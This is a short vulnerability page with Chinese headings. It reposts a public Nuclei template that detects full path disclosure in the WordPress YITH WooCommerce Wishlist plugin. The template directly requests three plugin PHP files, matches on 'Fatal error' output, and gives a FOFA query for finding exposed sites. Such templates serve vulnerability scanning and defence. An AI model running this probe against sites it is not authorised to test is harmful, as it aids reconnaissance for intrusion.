漏洞描述
WordPress YITH WooCommerce Wishlist plugin is vulnerable to full path disclosure via direct access to plugin files.
wp-yith-woocommerce-wishlist-fpd: WordPress YITH WooCommerce Wishlist - Full Path Disclosure
PoC代码[已公开]
id: wp-yith-woocommerce-wishlist-fpd
info:
name: WordPress YITH WooCommerce Wishlist - Full Path Disclosure
author: ritikchaddha
severity: low
description: |
WordPress YITH WooCommerce Wishlist plugin is vulnerable to full path disclosure via direct access to plugin files.
reference:
- https://wordpress.org/plugins/yith-woocommerce-wishlist/
metadata:
verified: true
max-request: 3
vendor: yithemes
product: yith-woocommerce-wishlist
framework: wordpress
fofa-query: body="/wp-content/plugins/yith-woocommerce-wishlist/"
tags: wp,wordpress,wp-plugin,fpd,yith,woocommerce,wishlist,exposure
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/includes/class-yith-wcwl.php"
- "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/includes/class-yith-wcwl-frontend.php"
- "{{BaseURL}}/wp-content/plugins/yith-woocommerce-wishlist/includes/functions-yith-wcwl.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Fatal error"
- "yith-woocommerce-wishlist"
- "Uncaught Error:"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402203c6275460538cd6e0deb8ca2d73e8470c04c909b67eb57de9c4531433184a40c02205928ded34df7c1c7341bd3193a7140985997018d9c4a8a963dd9ef502d49d6fd:922c64590222798bb761d5b6d8e72950